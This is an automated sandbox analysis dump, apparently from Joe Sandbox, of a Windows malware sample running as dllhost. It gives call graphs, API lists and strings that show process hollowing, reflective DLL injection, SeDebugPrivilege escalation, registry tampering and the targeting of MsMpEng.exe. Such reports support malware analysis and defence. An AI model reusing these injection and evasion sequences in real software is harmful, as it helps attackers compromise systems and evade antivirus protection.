19336->19333 19337->19339 19338 1c0401c4250 2 API calls 19340 1c0401c478b 19338->19340 19339->19338 19339->19340 19340->19312 19343 1c0401c4141 19341->19343 19342 1c0401c4196 VirtualQuery 19342->19343 19346 1c0401c41b0 19342->19346 19343->19342 19344 1c0401c41ca VirtualAlloc 19343->19344 19343->19346 19345 1c0401c41fb GetLastError 19344->19345 19344->19346 19345->19343 19346->19328 19350 1c0401c4268 19347->19350 19348 1c0401c42d7 19348->19330 19349 1c0401c42bd VirtualQuery 19349->19348 19349->19350 19350->19348 19350->19349 19351 1c0401c4322 GetLastError 19350->19351 19351->19348 19351->19350 19353 1c0401c796b 19352->19353 19354 1c0401c798f 19353->19354 19355 1c0401c7981 SetLastError 19353->19355 19354->19317 19355->19354 18160 1c0401cf370 VirtualProtect 18952 1c0401cf870 18953 1c0401cf8a0 18952->18953 18955 1c0401cf8c7 18952->18955 18954 1c0401ccb10 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18953->18954 18953->18955 18960 1c0401cf8b4 18953->18960 18954->18960 18956 1c0401cf99c 18955->18956 18975 1c0401cc558 EnterCriticalSection 18955->18975 18959 1c0401cfab3 18956->18959 18963 1c0401cfa03 18956->18963 18969 1c0401cf9ca 18956->18969 18957 1c0401cf904 18964 1c0401cfac0 18959->18964 18977 1c0401cc5ac LeaveCriticalSection 18959->18977 18960->18955 18960->18957 18961 1c0401cf949 18960->18961 18965 1c0401cd1f4 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18961->18965 18962 1c0401cfa61 18974 1c0401ccab0 14 API calls _invalid_parameter_noinfo 18962->18974 18963->18962 18976 1c0401cc5ac LeaveCriticalSection 18963->18976 18968 1c0401cf94e 18965->18968 18970 1c0401cd04c _invalid_parameter_noinfo 38 API calls 18968->18970 18969->18963 18971 1c0401ccab0 _invalid_parameter_noinfo 14 API calls 18969->18971 18970->18957 18972 1c0401cf9f3 18971->18972 18973 1c0401ccab0 _invalid_parameter_noinfo 14 API calls 18972->18973 18973->18963 18974->18962 17230 1c0401c8672 17233 1c0401c90c0 17230->17233 17232 1c0401c869d 17234 1c0401c90e1 17233->17234 17235 1c0401c9116 17233->17235 17234->17235 17237 1c0401cc328 17234->17237 17235->17232 17238 1c0401cc335 17237->17238 17239 1c0401cc33f 17237->17239 17238->17239 17244 1c0401cc35a 17238->17244 17240 1c0401cd1f4 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17239->17240 17241 1c0401cc346 17240->17241 17242 1c0401cd04c _invalid_parameter_noinfo 38 API calls 17241->17242 17243 1c0401cc352 17242->17243 17243->17235 17244->17243 17245 1c0401cd1f4 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17244->17245 17245->17241 18161 1c0401c2f64 18163 1c0401c2fc1 18161->18163 18162 1c0401c2fdc 18163->18162 18164 1c0401c38a8 3 API calls 18163->18164 18164->18162 18169 1c0401c7f60 18170 1c0401c7f7c 18169->18170 18171 1c0401c7f81 18169->18171 18173 1c0401c8090 18170->18173 18174 1c0401c8127 18173->18174 18175 1c0401c80b3 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 18173->18175 18174->18171 18175->18174 19429 1c0401d3960 19439 1c0401c8ca0 19429->19439 19431 1c0401d3988 19433 1c0401c9324 __CxxCallCatchBlock 9 API calls 19434 1c0401d3998 19433->19434 19435 1c0401c9324 __CxxCallCatchBlock 9 API calls 19434->19435 19436 1c0401d39a1 19435->19436 19437 1c0401cc2f4 14 API calls 19436->19437 19438 1c0401d39aa 19437->19438 19442 1c0401c8cd0 __CxxCallCatchBlock _IsNonwritableInCurrentImage __except_validate_context_record 19439->19442 19440 1c0401c8dd1 19440->19431 19440->19433 19441 1c0401c8d94 RtlUnwindEx 19441->19442 19442->19440 19442->19441 17476 1c04020465f 17477 1c040204677 17476->17477 17483 1c0402046e2 17476->17483 17478 1c0401f9324 __CxxCallCatchBlock 9 API calls 17477->17478 17477->17483 17479 1c0402046c4 17478->17479 17480 1c0401f9324 __CxxCallCatchBlock 9 API calls 17479->17480 17481 1c0402046d9 17480->17481 17484 1c0401fc2f4 17481->17484 17485 1c0401fcab0 _invalid_parameter_noinfo 14 API calls 17484->17485 17486 1c0401fc2fd 17485->17486 18183 1c0401d479d 18186 1c0401caf34 18183->18186 18187 1c0401caf9b 18186->18187 18188 1c0401caf4e 18186->18188 18188->18187 18189 1c0401c9324 __CxxCallCatchBlock 9 API calls 18188->18189 18189->18187 18190 1c0401d1398 18191 1c0401d13ae 18190->18191 18192 1c0401d13f5 18191->18192 18193 1c0401d140e 18191->18193 18194 1c0401cd1f4 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18192->18194 18196 1c0401cdd78 14 API calls 18193->18196 18198 1c0401d1405 18193->18198 18195 1c0401d13fa 18194->18195 18197 1c0401cd04c _invalid_parameter_noinfo 38 API calls 18195->18197 18196->18198 18197->18198 15593 140002cb0 15594 140002cbd 15593->15594 15595 140002300 6 API calls 15594->15595 15596 140002cd2 Sleep 15594->15596 15597 140002cdd ConnectNamedPipe 15594->15597 15595->15594 15596->15594 15598 140002d21 Sleep 15597->15598 15599 140002cec ReadFile 15597->15599 15600 140002d2c DisconnectNamedPipe 15598->15600 15599->15600 15601 140002d0f 15599->15601 15600->15597 15601->15600 15603 140003204 15601->15603 15604 14000322b 15603->15604 15605 14000341d 15603->15605 15606 140003231 15604->15606 15607 14000338b GetProcessHeap HeapAlloc K32EnumProcesses 15604->15607 15608 140003599 ReadFile 15605->15608 15609 140003429 15605->15609 15610 140003382 ExitProcess 15606->15610 15611 14000323d 15606->15611 15612 1400032ce 15607->15612 15631 1400033c9 15607->15631 15608->15612 15613 1400035c3 15608->15613 15614 140003432 15609->15614 15615 14000358f 15609->15615 15617 140003246 15611->15617 15618 1400032ea RegOpenKeyExW 15611->15618 15612->15601 15613->15612 15619 1400035d0 GetProcessHeap HeapAlloc 15613->15619 15620 140003534 15614->15620 15621 14000343e 15614->15621 15616 140001f7c 22 API calls 15615->15616 15625 1400032c9 15616->15625 15617->15612 15637 140003260 ReadFile 15617->15637 15622 140003353 15618->15622 15623 140003317 RegDeleteValueW RegDeleteValueW RegDeleteValueW 15618->15623 15626 140001cf0 13 API calls 15619->15626 15629 1400020fc ReadFile 15620->15629 15627 140003443 15621->15627 15628 140003480 15621->15628 15665 14000217c SysAllocString SysAllocString CoInitializeEx 15622->15665 15623->15622 15624 140001868 31 API calls 15624->15631 15625->15612 15647 140003609 15626->15647 15627->15612 15633 14000344f 15627->15633 15681 1400020fc 15628->15681 15634 140003543 15629->15634 15631->15612 15631->15624 15678 140002c5c 15633->15678 15634->15612 15644 1400020fc ReadFile 15634->15644 15636 14000335f 15641 14000217c 9 API calls 15636->15641 15637->15612 15642 14000328a 15637->15642 15638 14000363e GetProcessHeap HeapFree 15638->15612 15640 140003497 ReadFile 15640->15612 15645 1400034bf 15640->15645 15646 14000336b 15641->15646 15642->15612 15652 140001868 31 API calls 15642->15652 15649 14000355a 15644->15649 15645->15612 15650 1400034cc GetProcessHeap HeapAlloc ReadFile 15645->15650 15673 140001f7c GetProcessHeap HeapAlloc 15646->15673 15647->15638 15653 14000352f 15647->15653 15713 140001eec 15647->15713 15649->15612 15655 140003562 ShellExecuteW 15649->15655 15650->15638 15656 140003510 15650->15656 15658 1400032b0 15652->15658 15653->15638 15655->15612 15656->15638 15685 140002434 15656->15685 15661 140001868 31 API calls 15658->15661 15661->15625 15666 1400022d8 SysFreeString SysFreeString 15665->15666 15667 1400021bd CoInitializeSecurity 15665->15667 15666->15636 15668 140002205 CoCreateInstance 15667->15668 15669 1400021f9 15667->15669 15670 1400022d2 CoUninitialize 15668->15670 15671 140002234 VariantInit 15668->15671 15669->15668 15669->15670 15670->15666 15672 14000228a 15671->15672 15672->15670 15674 140001cf0 13 API calls 15673->15674 15676 140001fba 15674->15676 15675 140001fe8 GetProcessHeap HeapFree 15676->15675 15677 140001eec 5 API calls 15676->15677 15677->15676 15679 1400020cc 2 API calls 15678->15679 15680 140002c71 15679->15680 15682 140002120 ReadFile 15681->15682 15683 14000215d 15682->15683 15684 140002143 15682->15684 15683->15612 15683->15640 15684->15682 15684->15683 15686 14000246f 15685->15686 15710 140002726 15685->15710 15687 1400020cc 2 API calls 15686->15687 15709 1400024ae 15686->15709 15686->15710 15687->15709 15688 1400024d7 CreateProcessW 15688->15709 15689 1400028e1 OpenProcess 15691 1400028f1 TerminateProcess 15689->15691 15689->15709 15690 1400020cc GetModuleHandleA GetProcAddress 15690->15709 15691->15709 15692 140002566 VirtualAllocEx 15694 140002595 WriteProcessMemory 15692->15694 15692->15709 15693 14000273f VirtualAllocEx 15695 14000276d WriteProcessMemory 15693->15695 15693->15709 15696 1400025b7 VirtualProtectEx 15694->15696 15694->15709 15697 14000278f VirtualProtectEx 15695->15697 15695->15709 15696->15709 15697->15709 15698 140002682 VirtualAlloc 15700 1400026a7 GetThreadContext 15698->15700 15698->15709 15699 140002858 VirtualAlloc 15702 140002879 Wow64GetThreadContext 15699->15702 15699->15709 15704 1400026c4 WriteProcessMemory 15700->15704 15700->15709 15701 1400025f9 WriteProcessMemory 15701->15709 15705 140002891 WriteProcessMemory 15702->15705 15702->15709 15703 1400027d0 WriteProcessMemory 15703->15709 15706 1400026ef SetThreadContext 15704->15706 15704->15709 15707 1400028b6 Wow64SetThreadContext 15705->15707 15705->15709 15708 140002712 ResumeThread 15706->15708 15706->15709 15707->15709 15708->15709 15708->15710 15709->15688 15709->15689 15709->15690 15709->15692 15709->15693 15709->15698 15709->15699 15709->15701 15709->15703 15709->15710 15711 14000281a VirtualProtectEx 15709->15711 15712 140002643 VirtualProtectEx 15709->15712 15710->15653 15711->15709 15712->15709 15714 140001f65 15713->15714 15715 140001f0b OpenProcess 15713->15715 15714->15638 15715->15714 15716 140001f23 15715->15716 15717 140002bfc 2 API calls 15716->15717 15718 140001f43 15717->15718 15719 140001f5c CloseHandle 15718->15719 15720 140001f51 CloseHandle 15718->15720 15719->15714 15720->15719 18983 1c0401c5c8d 18985 1c0401c5c94 18983->18985 18984 1c0401c5cfb 18985->18984 18986 1c0401c5d77 VirtualProtect 18985->18986 18987 1c0401c5db1 18986->18987 18988 1c0401c5da3 GetLastError 18986->18988 18988->18987 19443 1c0401cc180 19446 1c0401cbf38 19443->19446 19453 1c0401cbf00 19446->19453 19451 1c0401cbebc 13 API calls 19452 1c0401cbf6b 19451->19452 19454 1c0401cbf15 19453->19454 19455 1c0401cbf10 19453->19455 19457 1c0401cbf1c 19454->19457 19456 1c0401cbebc 13 API calls 19455->19456 19456->19454 19458 1c0401cbf2c 19457->19458 19459 1c0401cbf31 19457->19459 19460 1c0401cbebc 13 API calls 19458->19460 19459->19451 19460->19459 19011 1c0401c34b8 19013 1c0401c34e8 19011->19013 19012 1c0401c35a1 19013->19012 19014 1c0401c3505 PdhGetCounterInfoW 19013->19014 19014->19012 19015 1c0401c3523 GetProcessHeap HeapAlloc PdhGetCounterInfoW 19014->19015 19016 1c0401c358d GetProcessHeap HeapFree 19015->19016 19017 1c0401c3555 StrCmpW 19015->19017 19016->19012 19017->19016 19019 1c0401c356a 19017->19019 19018 1c0401c3950 12 API calls 19018->19019 19019->19016 19019->19018 17498 1c0401c2ab4 TlsGetValue TlsGetValue TlsGetValue 17499 1c0401c2b0d 17498->17499 17504 1c0401c2b79 17498->17504 17501 1c0401c2b15 17499->17501 17499->17504 17500 1c0401c2b74 17501->17500 17502 1c0401c2c32 TlsSetValue TlsSetValue TlsSetValue 17501->17502 17503 1c0401c3f88 StrCmpNIW 17501->17503 17502->17500 17503->17501 17504->17500 17504->17502 17505 1c0401c3f88 StrCmpNIW 17504->17505 17505->17504 17514 1c0401caaac 17515 1c0401caad9 __except_validate_context_record 17514->17515 17516 1c0401c9324 __CxxCallCatchBlock 9 API calls 17515->17516 17517 1c0401caade 17516->17517 17519 1c0401cab38 17517->17519 17522 1c0401cabc6 17517->17522 17529 1c0401cab8c 17517->17529 17518 1c0401cac34 17518->17529 17556 1c0401ca22c 17518->17556 17520 1c0401cabb3 17519->17520 17528 1c0401cab5a __GetCurrentState 17519->17528 17519->17529 17543 1c0401c95d0 17520->17543 17525 1c0401cabe5 17522->17525 17550 1c0401c99cc 17522->17550 17525->17518 17525->17529 17553 1c0401c99e0 17525->17553 17526 1c0401cacdd 17528->17526 17531 1c0401cafb8 17528->17531 17532 1c0401c99cc Is_bad_exception_allowed 9 API calls 17531->17532 17533 1c0401cafe7 __GetCurrentState 17532->17533 17534 1c0401c9324 __CxxCallCatchBlock 9 API calls 17533->17534 17541 1c0401cb004 __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 17534->17541 17535 1c0401cb0fb 17536 1c0401c9324 __CxxCallCatchBlock 9 API calls 17535->17536 17537 1c0401cb100 17536->17537 17538 1c0401c9324 __CxxCallCatchBlock 9 API calls 17537->17538 17539 1c0401cb10b __FrameHandler3::GetHandlerSearchState 17537->17539 17538->17539 17539->17529 17540 1c0401c99cc 9 API calls Is_bad_exception_allowed 17540->17541 17541->17535 17541->17539 17541->17540 17613 1c0401c99f4 17541->17613 17616 1c0401c9634 17543->17616 17545 1c0401c95ef __FrameHandler3::GetHandlerSearchState 17620 1c0401c9540 17545->17620 17548 1c0401cafb8 __FrameHandler3::FrameUnwindToEmptyState 9 API calls 17549 1c0401c9624 17548->17549 17549->17529 17551 1c0401c9324 __CxxCallCatchBlock 9 API calls 17550->17551 17552 1c0401c99d5 17551->17552 17552->17525 17554 1c0401c9324 __CxxCallCatchBlock 9 API calls 17553->17554 17555 1c0401c99e9 17554->17555 17555->17518 17624 1c0401cb144 17556->17624 17558 1c0401ca6f4 17559 1c0401ca645 17559->17558 17599 1c0401ca643 17559->17599 17677 1c0401ca6fc 17559->17677 17560 1c0401ca373 17560->17559 17605 1c0401ca3ab 17560->17605 17561 1c0401c9324 __CxxCallCatchBlock 9 API calls 17565 1c0401ca687 17561->17565 17564 1c0401c9324 __CxxCallCatchBlock 9 API calls 17567 1c0401ca2da 17564->17567 17565->17558 17568 1c0401c8070 _invalid_parameter_noinfo 8 API calls 17565->17568 17566 1c0401ca575 17569 1c0401ca592 17566->17569 17571 1c0401c99cc Is_bad_exception_allowed 9 API calls 17566->17571 17566->17599 17567->17565 17572 1c0401c9324 __CxxCallCatchBlock 9 API calls 17567->17572 17570 1c0401ca69a 17568->17570 17576 1c0401ca5b4 17569->17576 17569->17599 17670 1c0401c95a4 17569->17670 17570->17529 17571->17569 17574 1c0401ca2ea 17572->17574 17575 1c0401c9324 __CxxCallCatchBlock 9 API calls 17574->17575 17579 1c0401ca2f3 17575->17579 17577 1c0401ca6d7 17576->17577 17578 1c0401ca5ca 17576->17578 17576->17599 17581 1c0401c9324 __CxxCallCatchBlock 9 API calls 17577->17581 17580 1c0401ca5d5 17578->17580 17583 1c0401c99cc Is_bad_exception_allowed 9 API calls 17578->17583 17635 1c0401c9a0c 17579->17635 17588 1c0401cb1dc 9 API calls 17580->17588 17585 1c0401ca6dd 17581->17585 17583->17580 17584 1c0401c99e0 9 API calls 17584->17605 17587 1c0401c9324 __CxxCallCatchBlock 9 API calls 17585->17587 17589 1c0401ca6e6 17587->17589 17590 1c0401ca5eb 17588->17590 17592 1c0401cc2f4 14 API calls 17589->17592 17594 1c0401c9634 __GetUnwindTryBlock RtlLookupFunctionEntry 17590->17594 17590->17599 17591 1c0401c9324 __CxxCallCatchBlock 9 API calls 17593 1c0401ca335 17591->17593 17592->17558 17593->17560 17596 1c0401c9324 __CxxCallCatchBlock 9 API calls 17593->17596 17595 1c0401ca605 17594->17595 17674 1c0401c9838 RtlUnwindEx 17595->17674 17598 1c0401ca341 17596->17598 17600 1c0401c9324 __CxxCallCatchBlock 9 API calls 17598->17600 17599->17561 17602 1c0401ca34a 17600->17602 17638 1c0401cb1dc 17602->17638 17605->17566 17605->17584 17649 1c0401ca96c 17605->17649 17663 1c0401ca158 17605->17663 17607 1c0401ca35e 17645 1c0401cb2cc 17607->17645 17609 1c0401ca6d1 17610 1c0401cc2f4 14 API calls 17609->17610 17610->17577 17611 1c0401ca366 __CxxCallCatchBlock std::bad_alloc::bad_alloc 17611->17609 17689 1c0401c9178 17611->17689 17614 1c0401c9324 __CxxCallCatchBlock 9 API calls 17613->17614 17615 1c0401c9a02 17614->17615 17615->17541 17617 1c0401c9662 __FrameHandler3::GetHandlerSearchState 17616->17617 17618 1c0401c96d4 17617->17618 17619 1c0401c968c RtlLookupFunctionEntry 17617->17619 17618->17545 17619->17617 17621 1c0401c958b 17620->17621 17623 1c0401c9560 17620->17623 17621->17548 17622 1c0401c9324 __CxxCallCatchBlock 9 API calls 17622->17623 17623->17621 17623->17622 17625 1c0401cb169 __FrameHandler3::GetHandlerSearchState 17624->17625 17626 1c0401c9634 __GetUnwindTryBlock RtlLookupFunctionEntry 17625->17626 17627 1c0401cb17e 17626->17627 17694 1c0401c9db4 17627->17694 17630 1c0401cb190 __FrameHandler3::GetHandlerSearchState 17697 1c0401c9dec 17630->17697 17631 1c0401cb1b3 17632 1c0401c9db4 __GetUnwindTryBlock RtlLookupFunctionEntry 17631->17632 17634 1c0401ca28e 17632->17634 17634->17558 17634->17560 17634->17564 17636 1c0401c9324 __CxxCallCatchBlock 9 API calls 17635->17636 17637 1c0401c9a1a 17636->17637 17637->17558 17637->17591 17639 1c0401cb2c3 17638->17639 17644 1c0401cb207 17638->17644 17640 1c0401ca35a 17640->17560 17640->17607 17641 1c0401c99e0 9 API calls 17641->17644 17642 1c0401c99cc Is_bad_exception_allowed 9 API calls 17642->17644 17643 1c0401ca96c 9 API calls 17643->17644 17644->17640 17644->17641 17644->17642 17644->17643 17647 1c0401cb2e9 Is_bad_exception_allowed 17645->17647 17648 1c0401cb339 17645->17648 17646 1c0401c99cc 9 API calls Is_bad_exception_allowed 17646->17647 17647->17646 17647->17648 17648->17611 17650 1c0401ca999 17649->17650 17662 1c0401caa28 17649->17662 17651 1c0401c99cc Is_bad_exception_allowed 9 API calls 17650->17651 17652 1c0401ca9a2 17651->17652 17653 1c0401c99cc Is_bad_exception_allowed 9 API calls 17652->17653 17654 1c0401ca9bb 17652->17654 17652->17662 17653->17654 17655 1c0401ca9e7 17654->17655 17656 1c0401c99cc Is_bad_exception_allowed 9 API calls 17654->17656 17654->17662 17657 1c0401c99e0 9 API calls 17655->17657 17656->17655 17658 1c0401ca9fb 17657->17658 17659 1c0401caa14 17658->17659 17660 1c0401c99cc Is_bad_exception_allowed 9 API calls 17658->17660 17658->17662 17661 1c0401c99e0 9 API calls 17659->17661 17660->17659 17661->17662 17662->17605 17664 1c0401c9634 __GetUnwindTryBlock RtlLookupFunctionEntry 17663->17664 17665 1c0401ca195 17664->17665 17666 1c0401c99cc Is_bad_exception_allowed 9 API calls 17665->17666 17667 1c0401ca1cd 17666->17667 17668 1c0401c9838 9 API calls 17667->17668 17669 1c0401ca211 17668->17669 17669->17605 17671 1c0401c95b8 __FrameHandler3::GetHandlerSearchState 17670->17671 17672 1c0401c9540 __FrameHandler3::ExecutionInCatch 9 API calls 17671->17672 17673 1c0401c95c2 17672->17673 17673->17576 17675 1c0401c8070 _invalid_parameter_noinfo 8 API calls 17674->17675 17676 1c0401c9932 17675->17676 17676->17599 17678 1c0401ca735 17677->17678 17682 1c0401ca948 17677->17682 17679 1c0401c9324 __CxxCallCatchBlock 9 API calls 17678->17679 17680 1c0401ca73a 17679->17680 17681 1c0401ca759 EncodePointer 17680->17681 17686 1c0401ca7ac 17680->17686 17683 1c0401c9324 __CxxCallCatchBlock 9 API calls 17681->17683 17682->17599 17684 1c0401ca769 17683->17684 17684->17686 17700 1c0401c94ec 17684->17700 17686->17682 17687 1c0401ca158 19 API calls 17686->17687 17688 1c0401c99cc 9 API calls Is_bad_exception_allowed 17686->17688 17687->17686 17688->17686 17690 1c0401c9197 17689->17690 17691 1c0401c91c0 RtlPcToFileHeader 17690->17691 17692 1c0401c91e2 RaiseException 17690->17692 17693 1c0401c91d8 17691->17693 17692->17609 17693->17692 17695 1c0401c9634 __GetUnwindTryBlock RtlLookupFunctionEntry 17694->17695 17696 1c0401c9dc7 17695->17696 17696->17630 17696->17631 17698 1c0401c9634 __GetUnwindTryBlock RtlLookupFunctionEntry 17697->17698 17699 1c0401c9e06 17698->17699 17699->17634 17701 1c0401c9324 __CxxCallCatchBlock 9 API calls 17700->17701 17702 1c0401c9518 17701->17702 17702->17686 18203 1c0401c33a8 18204 1c0401c33cf 18203->18204 18205 1c0401c349c 18204->18205 18206 1c0401c33ec PdhGetCounterInfoW 18204->18206 18206->18205 18207 1c0401c340e GetProcessHeap HeapAlloc PdhGetCounterInfoW 18206->18207 18208 1c0401c3488 GetProcessHeap HeapFree 18207->18208 18209 1c0401c3440 StrCmpW 18207->18209 18208->18205 18209->18208 18211 1c0401c3455 18209->18211 18211->18208 18212 1c0401c3950 StrCmpNW 18211->18212 18213 1c0401c3982 StrStrW 18212->18213 18216 1c0401c39f2 18212->18216 18214 1c0401c399b StrToIntW 18213->18214 18213->18216 18215 1c0401c39c3 18214->18215 18214->18216 18215->18216 18222 1c0401c1a30 OpenProcess 18215->18222 18216->18211 18219 1c0401c3f88 StrCmpNIW 18220 1c0401c39e4 18219->18220 18220->18216 18221 1c0401c1cfc 2 API calls 18220->18221 18221->18216 18223 1c0401c1a64 K32GetModuleFileNameExW 18222->18223 18224 1c0401c1ab6 18222->18224 18225 1c0401c1aad CloseHandle 18223->18225 18226 1c0401c1a7e PathFindFileNameW lstrlenW 18223->18226 18224->18216 18224->18219 18225->18224 18226->18225 18227 1c0401c1a9c StrCpyW 18226->18227 18227->18225 18228 1c0401d0fa8 18229 1c0401d0fcc 18228->18229 18230 1c0401c8070 _invalid_parameter_noinfo 8 API calls 18229->18230 18231 1c0401d100e 18230->18231 15581 1c0401cf6a0 15592 1c0401cc558 EnterCriticalSection 15581->15592 15583 1c0401cf6b0 15584 1c0401d1c5c 39 API calls 15583->15584 15585 1c0401cf6b9 15584->15585 15587 1c0401cf498 41 API calls 15585->15587 15591 1c0401cf6c7 15585->15591 15586 1c0401cc5ac Concurrency::details::SchedulerProxy::DeleteThis LeaveCriticalSection 15588 1c0401cf6d3 15586->15588 15589 1c0401cf6c2 15587->15589 15590 1c0401cf598 GetStdHandle GetFileType 15589->15590 15590->15591 15591->15586

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 0 140002d4c-140002d5c 1 140002d5e-140002d75 OpenMutexW 0->1 2 140002d84-140002dc1 CloseHandle call 140002a0c * 2 GetCurrentProcessId OpenProcess 1->2 3 140002d77-140002d82 Sleep 1->3 8 140002dc3-140002dd7 OpenProcessToken 2->8 9 140002e39-140002e64 RegOpenKeyExW 2->9 3->1 12 140002dd9-140002dee LookupPrivilegeValueW 8->12 13 140002e30-140002e33 CloseHandle 8->13 10 1400031b3-1400031c1 9->10 11 140002e6a-140002e94 RegQueryValueExW 9->11 11->10 15 140002e9a-140002ec4 RegQueryValueExW 11->15 12->13 14 140002df0-140002e28 AdjustTokenPrivileges 12->14 13->9 14->13 16 140002e2a GetLastError 14->16 15->10 17 140002eca-140002f36 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc RegQueryValueExW 15->17 16->13 17->10 18 140002f3c-140002f66 RegQueryValueExW 17->18 18->10 19 140002f6c-140002fba RegCloseKey GetCurrentProcessId call 14000200c RegCreateKeyExW 18->19 22 14000307d-140003111 CreateThread GetProcessHeap HeapAlloc CreateThread * 2 call 14000151c 19->22 23 140002fc0-140002fe6 ConvertStringSecurityDescriptorToSecurityDescriptorW 19->23 30 140003113-140003143 ShellExecuteW 22->30 31 140003145-1400031ad call 14000148c call 1400011d4 call 14000148c * 3 call 1400011d4 * 3 GetProcessHeap HeapFree SleepEx 22->31 25 140003002-14000303a RegCreateKeyExW 23->25 26 140002fe8-140002ffc RegSetKeySecurity LocalFree 23->26 28 140003073-140003077 RegCloseKey 25->28 29 14000303c-14000306d GetCurrentProcessId RegSetValueExW RegCloseKey 25->29 26->25 28->22 29->28 30->30 30->31 31->10
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2673229610.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000028.00000002.2672435865.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2674116081.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2674989251.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_140000000_dllhost.jbxd
                                  Similarity
                                  • API ID: Process$Heap$CloseValue$CreateOpen$AllocQuery$CurrentHandleSecurityThread$DescriptorFreeSleepToken$AdjustConvertErrorExecuteLastLocalLookupMutexPrivilegePrivilegesShellStringTerminate
                                  • String ID: $rbx-dll32$$rbx-dll64$?$D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)$Global\Onimai_3637bd27-1800-4db6-94b5-e49ce9967b2d$SOFTWARE$SOFTWARE\$rbx-config$SeDebugPrivilege$kernel32.dll$ntdll.dll$open$pid$svc64
                                  • API String ID: 2725631067-1382791509
                                  • Opcode ID: 19d6d12776ca0f2fbbe8990d885d79cc61f5dade11bb5855dcfccad145e38bad
                                  • Instruction ID: 11cca5996524c372b97bd826982d2baaf99c89fd62df68e9b01c6f7d22bdc91e
                                  • Opcode Fuzzy Hash: 19d6d12776ca0f2fbbe8990d885d79cc61f5dade11bb5855dcfccad145e38bad
                                  • Instruction Fuzzy Hash: 8DD1E0F6600A4086EB26DF22F8547DA27A5FB8CBD9F404116FB4A43A79DF38C589C744

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 48 140001868-1400018aa OpenProcess 49 140001cd1-140001ced 48->49 50 1400018b0-1400018c5 IsWow64Process 48->50 51 1400018d5 50->51 52 1400018c7-1400018d3 50->52 53 1400018db-1400018e7 CloseHandle 51->53 52->53 53->49 54 1400018ed-1400018f8 53->54 54->49 55 1400018fe-140001913 54->55 56 140001925 55->56 57 140001915-14000191a 55->57 59 140001927-140001929 56->59 57->49 58 140001920-140001923 57->58 58->59 59->49 60 14000192f-140001945 OpenProcess 59->60 60->49 61 14000194b-140001964 OpenProcess 60->61 62 140001a04-140001a23 NtQueryInformationProcess 61->62 63 14000196a-140001981 K32GetModuleFileNameExW 61->63 64 140001cc8-140001ccb CloseHandle 62->64 65 140001a29-140001a2d 62->65 66 1400019b3-1400019bf CloseHandle 63->66 67 140001983-14000199e PathFindFileNameW lstrlenW 63->67 64->49 65->64 68 140001a33-140001a4b OpenProcessToken 65->68 66->62 70 1400019c1-1400019db 66->70 67->66 69 1400019a0-1400019b0 StrCpyW 67->69 68->64 71 140001a51-140001a77 GetTokenInformation 68->71 69->66 72 1400019e0-1400019f2 StrCmpIW 70->72 74 140001af4 71->74 75 140001a79-140001a82 GetLastError 71->75 72->64 73 1400019f8-140001a02 72->73 73->62 73->72 77 140001afb-140001b09 CloseHandle 74->77 75->74 76 140001a84-140001a98 LocalAlloc 75->76 76->74 78 140001a9a-140001ac0 GetTokenInformation 76->78 77->64 79 140001b0f-140001b16 77->79 80 140001ae2 78->80 81 140001ac2-140001ae0 GetSidSubAuthorityCount GetSidSubAuthority 78->81 79->64 82 140001b1c-140001b27 79->82 83 140001ae9-140001af2 LocalFree 80->83 81->83 82->64 84 140001b2d-140001b37 82->84 83->77 85 140001b52 84->85 86 140001b39-140001b43 84->86 88 140001b56-140001b8e call 1400029a4 * 3 85->88 86->64 87 140001b49-140001b50 86->87 87->88 88->64 95 140001b94-140001bb4 call 1400029a4 StrStrA 88->95 98 140001bb6-140001bc6 95->98 99 140001bcd-140001bf2 call 1400029a4 * 2 95->99 98->95 101 140001bc8 98->101 99->64 105 140001bf8-140001c21 VirtualAllocEx 99->105 101->64 105->64 106 140001c27-140001c40 WriteProcessMemory 105->106 106->64 107 140001c46-140001c68 call 140002bfc 106->107 107->64 110 140001c6a-140001c72 107->110 110->64 111 140001c74-140001c81 WaitForSingleObject 110->111 112 140001c83-140001c97 GetExitCodeThread 111->112 113 140001cbd-140001cc2 CloseHandle 111->113 114 140001ca2-140001cbb VirtualFreeEx 112->114 115 140001c99-140001c9f 112->115 113->64 114->113 115->114
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2673229610.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000028.00000002.2672435865.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2674116081.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2674989251.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_140000000_dllhost.jbxd
                                  Similarity
                                  • API ID: Process$CloseHandle$Open$InformationToken$AllocAuthorityFileFreeLocalNameVirtual$CodeCountErrorExitFindLastMemoryModuleObjectPathQuerySingleThreadWaitWow64Writelstrlen
                                  • String ID: @$MSBuild.exe$MsMpEng.exe$ReflectiveDllMain
                                  • API String ID: 2456419452-2628171563
                                  • Opcode ID: 2d2d9d352461c9b57aa585ec06d48b5b40d6395f47d72d8764cd192164728847
                                  • Instruction ID: 2a11411cfc832b8c6424502e8b4f1e91c9a7b64b89c06221b22f1678334b3336
                                  • Opcode Fuzzy Hash: 2d2d9d352461c9b57aa585ec06d48b5b40d6395f47d72d8764cd192164728847
